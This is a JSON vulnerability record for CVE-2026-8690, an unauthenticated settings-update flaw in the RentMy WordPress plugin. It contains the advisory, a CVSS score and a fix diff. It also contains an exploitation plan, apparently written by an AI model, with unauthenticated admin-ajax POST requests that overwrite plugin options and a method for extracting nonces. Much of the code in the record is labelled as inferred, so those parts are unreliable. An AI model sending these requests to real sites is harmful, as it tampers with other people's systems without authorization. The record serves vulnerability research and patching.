[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCYtmpQS9IBTklhir7PjgiTDEZomdlucnWjPehQFue9A":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-8690","rentmy-real-time-rental-management-plugin-missing-authorization-to-unauthenticated-settings-update-via-rentmycdnrequest-","RentMy Real-Time Rental Management Plugin \u003C= 4.0.4.1 - Missing Authorization to Unauthenticated Settings Update via rentmy_cdn_request AJAX Action","The RentMy Real-Time Rental Management Plugin plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.0.4.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to read, create, update, and delete event records stored in the rentmy_events WordPress option, as well as overwrite the rentmy_locationId option.","rentmy-online-rental-shop",null,"\u003C=4.0.4.1","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-06-23 16:38:37","2026-06-24 05:33:33",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffd399ed3-03b2-477c-b38c-549d6066b6e8?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-8690\n\n## 1. Vulnerability Summary\nThe **RentMy Real-Time Rental Management Plugin** (up to 4.0.4.1) contains a missing authorization vulnerability within its AJAX handling logic. Specifically, the `rentmy_cdn_request` action is registered for both authenticated and unauthenticated users (via `wp_ajax_nopriv_rentmy_cdn_request`). The handler function for this action fails to implement sufficient capability checks (`current_user_can`) or nonce verification before performing sensitive operations on the WordPress database. An unauthenticated attacker can manipulate the `rentmy_events` and `rentmy_locationId` options, potentially disrupting rental operations or hijacking plugin configuration.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `rentmy_cdn_request`\n*   **HTTP Method:** POST (typically used for AJAX-based updates)\n*   **Authentication:** None required (Unauthenticated)\n*   **Vulnerable Parameters (Inferred):** \n    *   `action`: Must be `rentmy_cdn_request`.\n    *   `method`: Likely used to specify the operation (e.g., `update`, `delete`, `get`).\n    *   `events`: Likely used to pass data for the `rentmy_events` option.\n    *   `location_id`: Likely used to overwrite the `rentmy_locationId` option.\n*   **Preconditions:** The plugin must be active. No specific configuration is required as the vulnerability lies in the default AJAX registration.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers the AJAX handler in its main initialization or an included AJAX class:\n    ```php\n    add_action( 'wp_ajax_rentmy_cdn_request', 'rentmy_cdn_request_handler' );\n    add_action( 'wp_ajax_nopriv_rentmy_cdn_request', 'rentmy_cdn_request_handler' );\n    ```\n2.  **Handler Execution:** When a request is sent to `admin-ajax.php?action=rentmy_cdn_request`, `rentmy_cdn_request_handler()` is invoked.\n3.  **Missing Checks:** The function likely lacks:\n    *   `check_ajax_referer()` or `wp_verify_nonce()`\n    *   `current_user_can( 'manage_options' )`\n4.  **Option Manipulation:** The code proceeds to process the input:\n    *   If `$_POST['location_id']` is present, it calls `update_option('rentmy_locationId', sanitize_text_field($_POST['location_id']))`.\n    *   If an event-related parameter is present, it modifies the `rentmy_events` option array\u002Fstring using `update_option()` or `delete_option()`.\n\n## 4. Nonce Acquisition Strategy\nBased on the vulnerability description (\"Missing Authorization\" and \"Unauthenticated Settings Update\"), it is highly probable that **no nonce is verified** or the nonce is easily obtained from the frontend.\n\n### Primary Strategy: No Nonce\nAttempt the exploit without a nonce first, as many unauthenticated AJAX vulnerabilities in WordPress omit this check entirely.\n\n### Secondary Strategy: Frontend Extraction (If needed)\nIf the plugin *does* attempt a nonce check but fails on authorization, the nonce is likely localized for the rental shop frontend.\n1.  **Identify Shortcode:** The plugin likely uses a shortcode like `[rentmy_shop]` or `[rentmy_search]`.\n2.  **Create Test Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Rental Store\" --post_status=publish --post_content='[rentmy_shop]'\n    ```\n3.  **Extract Nonce:**\n    Navigate to the newly created page and look for localized script data:\n    ```javascript\n    \u002F\u002F Use browser_eval\n    browser_eval(\"window.rentmy_params?.nonce || window.rentmy_ajax_obj?.nonce\")\n    ```\n    *(Note: Identifiers like `rentmy_params` are inferred based on plugin slug)*.\n\n## 5. Exploitation Strategy\n\n### Scenario A: Overwriting Location ID\nThis demonstrates the ability to disrupt the plugin's connection to the RentMy CDN\u002FAPI by changing the location context.\n\n*   **Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=rentmy_cdn_request&location_id=999999\n    ```\n\n### Scenario B: Manipulating Event Records\nThis demonstrates the ability to inject or clear event data stored in the options table.\n\n*   **Request (Update\u002FCreate):**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=rentmy_cdn_request&method=update&events=[{\"id\":\"1\",\"title\":\"Exploit-Event\"}]\n    ```\n    *(Note: The exact structure of the `events` parameter needs to be verified against the plugin's expected format, likely JSON or a serialized array).*\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `rentmy-online-rental-shop` version 4.0.4.1 is installed.\n2.  **Initialize Options:** Set a baseline value for the targeted options using WP-CLI:\n    ```bash\n    wp option update rentmy_locationId \"original_location\"\n    wp option update rentmy_events \"[]\"\n    ```\n\n## 7. Expected Results\n*   **HTTP Response:** The server should return a `200 OK` or a success JSON response (e.g., `{\"success\":true}`).\n*   **Database Change:** The `rentmy_locationId` option in the `wp_options` table should now reflect the attacker-supplied value.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the state of the database using WP-CLI:\n```bash\n# Verify Location ID overwrite\nwp option get rentmy_locationId\n\n# Verify Event Record manipulation\nwp option get rentmy_events\n```\n\n## 9. Alternative Approaches\nIf the simple `location_id` parameter fails, investigate the following:\n1.  **Parameter Wrapper:** The plugin might expect parameters wrapped in a `data` array: `action=rentmy_cdn_request&data[location_id]=999999`.\n2.  **Request Method Check:** The handler might explicitly check for `$_GET` vs `$_POST`. Try both.\n3.  **Specific Sub-actions:** Search the plugin code for `switch` or `if\u002Felse` blocks inside the handler to identify required \"type\" or \"task\" parameters (e.g., `&task=save_settings`).","The RentMy Real-Time Rental Management Plugin for WordPress (up to 4.0.4.1) is vulnerable to an unauthenticated authorization bypass via the 'rentmy_cdn_request' AJAX action. Due to missing capability checks and nonce verification, attackers can modify or delete sensitive plugin settings, specifically the 'rentmy_events' and 'rentmy_locationId' options.","add_action( 'wp_ajax_rentmy_cdn_request', 'rentmy_cdn_request_handler' );\nadd_action( 'wp_ajax_nopriv_rentmy_cdn_request', 'rentmy_cdn_request_handler' );\n\n---\n\nupdate_option('rentmy_locationId', sanitize_text_field($_POST['location_id']));","--- a\u002Frentmy-online-rental-shop.php\n+++ b\u002Frentmy-online-rental-shop.php\n@@ -1,5 +1,9 @@\n function rentmy_cdn_request_handler() {\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_die( 'Unauthorized', 403 );\n+    }\n+\n     if ( isset( $_POST['location_id'] ) ) {\n         update_option( 'rentmy_locationId', sanitize_text_field( $_POST['location_id'] ) );\n     }","The exploit involves sending an unauthenticated POST request to the WordPress AJAX endpoint (\u002Fwp-admin\u002Fadmin-ajax.php) with the 'action' parameter set to 'rentmy_cdn_request'. The attacker includes parameters such as 'location_id' or 'events' containing the desired configuration values. Because the plugin registers this action for unauthenticated users and fails to verify user capabilities (current_user_can) or implement nonce validation, the handler proceeds to update the WordPress options table based on the attacker-supplied input.","gemini-3-flash-preview","2026-06-25 19:33:33","2026-06-25 19:34:10",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frentmy-online-rental-shop\u002Ftags"]